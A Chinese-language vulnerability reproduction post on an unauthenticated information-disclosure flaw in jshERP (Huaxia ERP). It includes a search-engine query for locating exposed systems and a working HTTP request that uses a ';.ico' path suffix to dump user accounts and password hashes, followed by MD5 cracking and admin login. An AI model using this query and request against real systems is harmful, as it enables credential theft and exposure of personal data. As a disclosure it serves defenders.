免责声明:该文章仅用于技术讨论与学习。请勿利用文章所提供的相关技术从事非法测试,若利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果均与文章作者及本账号无关。
漏洞名称
华夏ERP信息泄露漏洞
漏洞评分
7.5(高危)
CVSS:3.X /AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
漏洞详情
jshERP立志为中小企业提供开源好用的ERP软件,降低企业的信息化成本,目前专注进销存+财务功能。主要模块有零售管理、入库管理、出库管理、组装拆卸、财务管理、报表查询、基础数据、系统管理等。支持预付款、收入支出、仓库调拨、采购销售、礼品卡等特色功能。拥有库存状况、出入库统计等报表。同时对角色和权限进行了细致全面,精确到每个按钮和菜单。该系统存在敏感信息泄露漏洞,通过此漏洞攻击者可以获取系统用户,登录用户名,密码,职位等个人敏感信息。
影响产品
华夏ERP
漏洞复现
1.hunter查询语法:web.body="jshERP-boot"
2.系统登录页面:
3. POC
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1Host:Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en-GB;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Accept: */*
Md5解密,登录后台
解决方案
补丁文件
补丁名称:华夏ERP信息泄露漏洞—目前官方暂未发布安全版本修复此漏洞,建议联系厂商获取加固建议
公告链接:https://blog.csdn.net/qq_17754023/article/details/131340697
补丁链接:https://www.huaxiaerp.com/
补丁编号:QNPD-2023-13712
补丁来源:其他
补丁类型:官方补丁
发布时间:2023-11-17
更新时间:2023-11-17 10:33:10
验证状态:未验证
其他修复方法
安装补丁
缓解方案
无
原文始发于微信公众号(蚁剑安全实验室):【漏洞复现】华夏ERP信息泄露漏
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论